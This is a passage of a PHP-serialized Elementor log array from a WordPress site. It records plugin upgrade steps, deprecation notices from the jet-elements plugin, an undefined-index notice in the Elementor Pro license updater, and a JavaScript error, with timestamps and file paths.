Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"199f391484eb653b31ebc6a4c33dd66a\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:30:53\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:30:53\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"d4c608fba367267c5256ed7143dce78d\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:30:54\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:30:54\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"d8ba751fab63e5c768c0d98607b3b150\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:30:54\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.6.6\";s:2:\"to\";s:5:\"3.7.8\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:30:54\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.6.6\";s:2:\"to\";s:5:\"3.7.8\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"74244fcdba5766a115bd15a0f6ce96c6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:30:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.6.6\";s:2:\"to\";s:5:\"3.7.8\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:30:56\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.6.6\";s:2:\"to\";s:5:\"3.7.8\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"a4d770e59bdd55268e296aea553e35c5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:38:40\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"elementor-pro::elementor_pro_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:38:40\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"elementor-pro::elementor_pro_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"061b1d5f089a4159e29e2c50b6f974d6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:38:40\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:48:\"Elementor Pro/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:38:40\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:48:\"Elementor Pro/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"f56be13d4a0d7cb8a69b8621c1dab93d\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:38:40\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor Pro/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:38:40\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:50:\"Elementor Pro/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"5e364113acf7879a8d20ea143135d4c4\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:38:40\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:87:\"Elementor Pro/Upgrades - _v_3_7_2_woocommerce_rename_related_to_related_products Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:38:40\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:87:\"Elementor Pro/Upgrades - _v_3_7_2_woocommerce_rename_related_to_related_products Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"755e3c849df0c7e54a0cfb7306778aa6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:38:40\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:5:\"3.7.1\";s:2:\"to\";s:5:\"3.7.7\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:38:40\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:5:\"3.7.1\";s:2:\"to\";s:5:\"3.7.7\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"c71290323570da5a771d491720fce939\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:38:40\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:89:\"Elementor Pro/Upgrades - _v_3_7_2_woocommerce_rename_related_to_related_products Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:38:40\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:89:\"Elementor Pro/Upgrades - _v_3_7_2_woocommerce_rename_related_to_related_products Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"d4271d5a4016271a68af7a274fd71fff\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:38:40\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:5:\"3.7.1\";s:2:\"to\";s:5:\"3.7.7\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2022-10-18 08:38:40\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:5:\"3.7.1\";s:2:\"to\";s:5:\"3.7.7\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"1bba1900be64b6c772d5bc3527a9764c\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2022-10-18 08:39:34\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:28:\"Undefined index: new_version\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:2292;s:14:\"\0*\0times_dates\";a:42:{i:0;s:19:\"2026-01-20 16:44:42\";i:1;s:19:\"2026-01-21 04:45:57\";i:2;s:19:\"2026-01-21 16:44:22\";i:3;s:19:\"2026-01-22 04:46:36\";i:4;s:19:\"2026-01-22 16:44:11\";i:5;s:19:\"2026-01-23 04:44:49\";i:6;s:19:\"2026-01-23 16:44:10\";i:7;s:19:\"2026-01-24 04:44:24\";i:8;s:19:\"2026-01-24 16:44:24\";i:9;s:19:\"2026-01-25 04:45:15\";i:10;s:19:\"2026-01-25 16:44:14\";i:11;s:19:\"2026-01-26 04:44:07\";i:12;s:19:\"2026-01-26 16:44:58\";i:13;s:19:\"2026-01-27 04:44:34\";i:14;s:19:\"2026-01-28 04:44:16\";i:15;s:19:\"2026-01-28 16:44:28\";i:16;s:19:\"2026-01-29 04:44:08\";i:17;s:19:\"2026-01-29 16:45:22\";i:18;s:19:\"2026-01-30 04:44:06\";i:19;s:19:\"2026-01-30 16:46:51\";i:20;s:19:\"2026-01-31 04:44:41\";i:21;s:19:\"2026-01-31 16:44:20\";i:22;s:19:\"2026-02-01 04:45:52\";i:23;s:19:\"2026-02-01 16:45:20\";i:24;s:19:\"2026-02-02 04:44:06\";i:25;s:19:\"2026-02-02 16:44:07\";i:26;s:19:\"2026-02-03 04:45:52\";i:27;s:19:\"2026-02-03 16:44:55\";i:28;s:19:\"2026-02-04 04:45:59\";i:29;s:19:\"2026-02-04 16:44:43\";i:30;s:19:\"2026-02-05 04:45:14\";i:31;s:19:\"2026-02-05 16:45:16\";i:32;s:19:\"2026-02-06 04:44:16\";i:33;s:19:\"2026-02-06 16:44:29\";i:34;s:19:\"2026-02-07 04:44:41\";i:35;s:19:\"2026-02-07 16:44:13\";i:36;s:19:\"2026-02-08 04:46:13\";i:37;s:19:\"2026-02-08 16:48:21\";i:38;s:19:\"2026-02-09 04:44:05\";i:39;s:19:\"2026-02-09 16:44:11\";i:40;s:19:\"2026-02-10 04:44:09\";i:41;s:19:\"2026-02-10 16:44:29\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:28:\"Undefined index: new_version\";s:4:\"file\";s:78:\"/home/ekmslib/public_html/wp-content/plugins/elementor-pro/license/updater.php\";s:4:\"line\";i:84;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:78:\"/home/ekmslib/public_html/wp-content/plugins/elementor-pro/license/updater.php\";s:7:\"\0*\0line\";i:84;}s:32:\"56b9d8e9436bd1d17d63ff0b7fce9d26\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2022-10-18 09:01:06\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:59:\"The $control_id argument is deprecated since version 3.5.0!\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:5:{i:0;a:3:{s:8:\"function\";s:18:\"rest_error_handler\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}i:1;a:3:{s:4:\"file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:4:\"line\";i:304;s:8:\"function\";s:13:\"trigger_error\";}i:2;a:5:{s:4:\"file\";s:85:\"/home/ekmslib/public_html/wp-content/plugins/elementor/includes/managers/controls.php\";s:4:\"line\";i:523;s:8:\"function\";s:19:\"deprecated_argument\";s:5:\"class\";s:38:\"Elementor\\Modules\\DevTools\\Deprecation\";s:4:\"type\";s:2:\"->\";}i:3;a:5:{s:4:\"file\";s:85:\"/home/ekmslib/public_html/wp-content/plugins/elementor/includes/managers/controls.php\";s:4:\"line\";i:501;s:8:\"function\";s:8:\"register\";s:5:\"class\";s:26:\"Elementor\\Controls_Manager\";s:4:\"type\";s:2:\"->\";}i:4;a:5:{s:4:\"file\";s:101:\"/home/ekmslib/public_html/wp-content/plugins/jet-elements/includes/class-jet-elements-integration.php\";s:4:\"line\";i:247;s:8:\"function\";s:16:\"register_control\";s:5:\"class\";s:26:\"Elementor\\Controls_Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1047;s:14:\"\0*\0times_dates\";a:42:{i:0;s:19:\"2026-05-31 07:11:50\";i:1;s:19:\"2026-05-31 14:35:41\";i:2;s:19:\"2026-05-31 19:28:12\";i:3;s:19:\"2026-05-31 21:25:03\";i:4;s:19:\"2026-06-01 05:51:29\";i:5;s:19:\"2026-06-01 12:04:37\";i:6;s:19:\"2026-06-03 03:34:50\";i:7;s:19:\"2026-06-03 15:17:58\";i:8;s:19:\"2026-06-05 13:48:55\";i:9;s:19:\"2026-06-06 05:26:55\";i:10;s:19:\"2026-06-06 08:36:28\";i:11;s:19:\"2026-06-07 07:18:21\";i:12;s:19:\"2026-06-07 10:38:25\";i:13;s:19:\"2026-06-07 13:27:34\";i:14;s:19:\"2026-06-08 13:04:50\";i:15;s:19:\"2026-06-13 06:44:35\";i:16;s:19:\"2026-06-13 06:47:13\";i:17;s:19:\"2026-06-13 06:47:55\";i:18;s:19:\"2026-06-13 06:48:14\";i:19;s:19:\"2026-06-13 06:49:18\";i:20;s:19:\"2026-06-13 06:50:30\";i:21;s:19:\"2026-06-13 06:51:53\";i:22;s:19:\"2026-06-13 06:51:59\";i:23;s:19:\"2026-06-13 06:52:25\";i:24;s:19:\"2026-06-13 06:52:36\";i:25;s:19:\"2026-06-13 06:52:43\";i:26;s:19:\"2026-06-13 06:53:26\";i:27;s:19:\"2026-06-13 06:53:48\";i:28;s:19:\"2026-06-15 12:22:10\";i:29;s:19:\"2026-06-15 13:43:53\";i:30;s:19:\"2026-06-15 13:51:34\";i:31;s:19:\"2026-06-15 13:51:54\";i:32;s:19:\"2026-06-15 20:40:26\";i:33;s:19:\"2026-06-15 21:09:20\";i:34;s:19:\"2026-06-16 09:27:15\";i:35;s:19:\"2026-06-16 20:20:32\";i:36;s:19:\"2026-06-17 06:32:17\";i:37;s:19:\"2026-06-18 19:42:11\";i:38;s:19:\"2026-06-21 14:23:52\";i:39;s:19:\"2026-06-21 14:25:58\";i:40;s:19:\"2026-06-21 17:44:12\";i:41;s:19:\"2026-06-21 17:51:33\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:59:\"The $control_id argument is deprecated since version 3.5.0!\";s:4:\"file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:4:\"line\";i:304;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:7:\"\0*\0line\";i:304;}s:32:\"77352bce3b145d7228b14bce443951c1\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2022-10-18 09:01:06\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:59:\"The $control_id argument is deprecated since version 3.5.0!\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:5:{i:0;a:3:{s:8:\"function\";s:18:\"rest_error_handler\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}i:1;a:3:{s:4:\"file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:4:\"line\";i:304;s:8:\"function\";s:13:\"trigger_error\";}i:2;a:5:{s:4:\"file\";s:85:\"/home/ekmslib/public_html/wp-content/plugins/elementor/includes/managers/controls.php\";s:4:\"line\";i:523;s:8:\"function\";s:19:\"deprecated_argument\";s:5:\"class\";s:38:\"Elementor\\Modules\\DevTools\\Deprecation\";s:4:\"type\";s:2:\"->\";}i:3;a:5:{s:4:\"file\";s:85:\"/home/ekmslib/public_html/wp-content/plugins/elementor/includes/managers/controls.php\";s:4:\"line\";i:501;s:8:\"function\";s:8:\"register\";s:5:\"class\";s:26:\"Elementor\\Controls_Manager\";s:4:\"type\";s:2:\"->\";}i:4;a:5:{s:4:\"file\";s:101:\"/home/ekmslib/public_html/wp-content/plugins/jet-elements/includes/class-jet-elements-integration.php\";s:4:\"line\";i:285;s:8:\"function\";s:16:\"register_control\";s:5:\"class\";s:26:\"Elementor\\Controls_Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1047;s:14:\"\0*\0times_dates\";a:42:{i:0;s:19:\"2026-05-31 07:11:50\";i:1;s:19:\"2026-05-31 14:35:41\";i:2;s:19:\"2026-05-31 19:28:12\";i:3;s:19:\"2026-05-31 21:25:03\";i:4;s:19:\"2026-06-01 05:51:29\";i:5;s:19:\"2026-06-01 12:04:37\";i:6;s:19:\"2026-06-03 03:34:51\";i:7;s:19:\"2026-06-03 15:17:58\";i:8;s:19:\"2026-06-05 13:48:55\";i:9;s:19:\"2026-06-06 05:26:55\";i:10;s:19:\"2026-06-06 08:36:28\";i:11;s:19:\"2026-06-07 07:18:21\";i:12;s:19:\"2026-06-07 10:38:25\";i:13;s:19:\"2026-06-07 13:27:34\";i:14;s:19:\"2026-06-08 13:04:50\";i:15;s:19:\"2026-06-13 06:44:35\";i:16;s:19:\"2026-06-13 06:47:13\";i:17;s:19:\"2026-06-13 06:47:55\";i:18;s:19:\"2026-06-13 06:48:14\";i:19;s:19:\"2026-06-13 06:49:18\";i:20;s:19:\"2026-06-13 06:50:30\";i:21;s:19:\"2026-06-13 06:51:53\";i:22;s:19:\"2026-06-13 06:51:59\";i:23;s:19:\"2026-06-13 06:52:25\";i:24;s:19:\"2026-06-13 06:52:36\";i:25;s:19:\"2026-06-13 06:52:43\";i:26;s:19:\"2026-06-13 06:53:26\";i:27;s:19:\"2026-06-13 06:53:48\";i:28;s:19:\"2026-06-15 12:22:10\";i:29;s:19:\"2026-06-15 13:43:53\";i:30;s:19:\"2026-06-15 13:51:34\";i:31;s:19:\"2026-06-15 13:51:54\";i:32;s:19:\"2026-06-15 20:40:26\";i:33;s:19:\"2026-06-15 21:09:20\";i:34;s:19:\"2026-06-16 09:27:15\";i:35;s:19:\"2026-06-16 20:20:32\";i:36;s:19:\"2026-06-17 06:32:17\";i:37;s:19:\"2026-06-18 19:42:11\";i:38;s:19:\"2026-06-21 14:23:52\";i:39;s:19:\"2026-06-21 14:25:58\";i:40;s:19:\"2026-06-21 17:44:12\";i:41;s:19:\"2026-06-21 17:51:33\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:59:\"The $control_id argument is deprecated since version 3.5.0!\";s:4:\"file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:4:\"line\";i:304;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:7:\"\0*\0line\";i:304;}s:32:\"448448389809f0186e3adf11b3033c4c\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2022-10-18 09:01:06\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:59:\"The $control_id argument is deprecated since version 3.5.0!\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:5:{i:0;a:3:{s:8:\"function\";s:18:\"rest_error_handler\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}i:1;a:3:{s:4:\"file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:4:\"line\";i:304;s:8:\"function\";s:13:\"trigger_error\";}i:2;a:5:{s:4:\"file\";s:85:\"/home/ekmslib/public_html/wp-content/plugins/elementor/includes/managers/controls.php\";s:4:\"line\";i:523;s:8:\"function\";s:19:\"deprecated_argument\";s:5:\"class\";s:38:\"Elementor\\Modules\\DevTools\\Deprecation\";s:4:\"type\";s:2:\"->\";}i:3;a:5:{s:4:\"file\";s:85:\"/home/ekmslib/public_html/wp-content/plugins/elementor/includes/managers/controls.php\";s:4:\"line\";i:501;s:8:\"function\";s:8:\"register\";s:5:\"class\";s:26:\"Elementor\\Controls_Manager\";s:4:\"type\";s:2:\"->\";}i:4;a:5:{s:4:\"file\";s:126:\"/home/ekmslib/public_html/wp-content/plugins/jet-elements/includes/modules/jet-elementor-extension/jet-elementor-extension.php\";s:4:\"line\";i:95;s:8:\"function\";s:16:\"register_control\";s:5:\"class\";s:26:\"Elementor\\Controls_Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:80;s:14:\"\0*\0times_dates\";a:42:{i:0;s:19:\"2022-12-17 21:19:35\";i:1;s:19:\"2022-12-23 01:07:24\";i:2;s:19:\"2022-12-30 04:51:38\";i:3;s:19:\"2023-01-04 01:17:10\";i:4;s:19:\"2023-01-15 22:47:54\";i:5;s:19:\"2023-01-16 23:48:28\";i:6;s:19:\"2023-01-18 05:25:05\";i:7;s:19:\"2023-01-18 07:00:43\";i:8;s:19:\"2023-01-19 18:07:26\";i:9;s:19:\"2023-01-21 03:08:56\";i:10;s:19:\"2023-01-22 15:21:21\";i:11;s:19:\"2023-01-26 22:26:24\";i:12;s:19:\"2023-01-27 11:16:15\";i:13;s:19:\"2023-02-05 16:36:03\";i:14;s:19:\"2023-02-07 06:36:48\";i:15;s:19:\"2023-02-07 18:17:01\";i:16;s:19:\"2023-02-08 02:47:53\";i:17;s:19:\"2023-02-08 03:26:31\";i:18;s:19:\"2023-02-12 07:27:03\";i:19;s:19:\"2023-02-13 10:55:11\";i:20;s:19:\"2023-02-16 10:35:26\";i:21;s:19:\"2023-02-17 09:32:34\";i:22;s:19:\"2023-02-17 10:24:27\";i:23;s:19:\"2023-02-18 21:22:47\";i:24;s:19:\"2023-03-06 07:11:22\";i:25;s:19:\"2023-03-09 09:18:12\";i:26;s:19:\"2023-03-10 09:52:10\";i:27;s:19:\"2023-03-11 02:57:09\";i:28;s:19:\"2023-03-11 02:57:12\";i:29;s:19:\"2023-03-12 02:53:16\";i:30;s:19:\"2023-03-12 12:15:32\";i:31;s:19:\"2023-03-12 13:25:08\";i:32;s:19:\"2023-03-14 11:56:16\";i:33;s:19:\"2023-03-16 06:12:48\";i:34;s:19:\"2023-03-17 12:00:34\";i:35;s:19:\"2023-03-17 20:51:35\";i:36;s:19:\"2023-03-17 20:58:17\";i:37;s:19:\"2023-03-17 21:04:43\";i:38;s:19:\"2023-03-18 05:29:06\";i:39;s:19:\"2023-03-18 07:04:33\";i:40;s:19:\"2023-03-22 01:15:09\";i:41;s:19:\"2023-03-22 03:19:24\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:59:\"The $control_id argument is deprecated since version 3.5.0!\";s:4:\"file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:4:\"line\";i:304;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:7:\"\0*\0line\";i:304;}s:32:\"ca00b9f4d64562d8ce341467778733b9\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2022-10-18 09:01:06\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:59:\"The $control_id argument is deprecated since version 3.5.0!\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:5:{i:0;a:3:{s:8:\"function\";s:18:\"rest_error_handler\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}i:1;a:3:{s:4:\"file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:4:\"line\";i:304;s:8:\"function\";s:13:\"trigger_error\";}i:2;a:5:{s:4:\"file\";s:85:\"/home/ekmslib/public_html/wp-content/plugins/elementor/includes/managers/controls.php\";s:4:\"line\";i:523;s:8:\"function\";s:19:\"deprecated_argument\";s:5:\"class\";s:38:\"Elementor\\Modules\\DevTools\\Deprecation\";s:4:\"type\";s:2:\"->\";}i:3;a:5:{s:4:\"file\";s:85:\"/home/ekmslib/public_html/wp-content/plugins/elementor/includes/managers/controls.php\";s:4:\"line\";i:501;s:8:\"function\";s:8:\"register\";s:5:\"class\";s:26:\"Elementor\\Controls_Manager\";s:4:\"type\";s:2:\"->\";}i:4;a:5:{s:4:\"file\";s:126:\"/home/ekmslib/public_html/wp-content/plugins/jet-elements/includes/modules/jet-elementor-extension/jet-elementor-extension.php\";s:4:\"line\";i:96;s:8:\"function\";s:16:\"register_control\";s:5:\"class\";s:26:\"Elementor\\Controls_Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:80;s:14:\"\0*\0times_dates\";a:42:{i:0;s:19:\"2022-12-17 21:19:35\";i:1;s:19:\"2022-12-23 01:07:24\";i:2;s:19:\"2022-12-30 04:51:38\";i:3;s:19:\"2023-01-04 01:17:10\";i:4;s:19:\"2023-01-15 22:47:54\";i:5;s:19:\"2023-01-16 23:48:28\";i:6;s:19:\"2023-01-18 05:25:05\";i:7;s:19:\"2023-01-18 07:00:43\";i:8;s:19:\"2023-01-19 18:07:26\";i:9;s:19:\"2023-01-21 03:08:56\";i:10;s:19:\"2023-01-22 15:21:21\";i:11;s:19:\"2023-01-26 22:26:24\";i:12;s:19:\"2023-01-27 11:16:15\";i:13;s:19:\"2023-02-05 16:36:03\";i:14;s:19:\"2023-02-07 06:36:48\";i:15;s:19:\"2023-02-07 18:17:01\";i:16;s:19:\"2023-02-08 02:47:53\";i:17;s:19:\"2023-02-08 03:26:31\";i:18;s:19:\"2023-02-12 07:27:03\";i:19;s:19:\"2023-02-13 10:55:11\";i:20;s:19:\"2023-02-16 10:35:26\";i:21;s:19:\"2023-02-17 09:32:34\";i:22;s:19:\"2023-02-17 10:24:27\";i:23;s:19:\"2023-02-18 21:22:47\";i:24;s:19:\"2023-03-06 07:11:22\";i:25;s:19:\"2023-03-09 09:18:12\";i:26;s:19:\"2023-03-10 09:52:10\";i:27;s:19:\"2023-03-11 02:57:09\";i:28;s:19:\"2023-03-11 02:57:12\";i:29;s:19:\"2023-03-12 02:53:16\";i:30;s:19:\"2023-03-12 12:15:32\";i:31;s:19:\"2023-03-12 13:25:08\";i:32;s:19:\"2023-03-14 11:56:16\";i:33;s:19:\"2023-03-16 06:12:48\";i:34;s:19:\"2023-03-17 12:00:34\";i:35;s:19:\"2023-03-17 20:51:35\";i:36;s:19:\"2023-03-17 20:58:17\";i:37;s:19:\"2023-03-17 21:04:43\";i:38;s:19:\"2023-03-18 05:29:06\";i:39;s:19:\"2023-03-18 07:04:33\";i:40;s:19:\"2023-03-22 01:15:09\";i:41;s:19:\"2023-03-22 03:19:24\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:59:\"The $control_id argument is deprecated since version 3.5.0!\";s:4:\"file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:4:\"line\";i:304;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:88:\"/home/ekmslib/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php\";s:7:\"\0*\0line\";i:304;}s:32:\"a0de4e3b1a87a073f2410bada5b2c55b\";O:30:\"Elementor\\Core\\Logger\\Items\\JS\":10:{s:7:\"\0*\0date\";s:19:\"2023-06-16 11:40:53\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:29:\"this.subscribers is undefined\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:4;s:14:\"\0*\0times_dates\";a:4:{i:0;s:19:\"2023-06-16 11:40:53\";i:1;s:19:\"2023-06-16 11:44:33\";i:2;s:19:\"2023-09-13 21:40:30\";i:3;s:19:\"2023-09-14 19:45:48\";}s:7:\"\0*\0args\";a:6:{s:4:\"type\";s:5:\"error\";s:9:\"timestamp\";s:10:\"1686915653\";s:7:\"message\";s:29:\"this.subscribers is 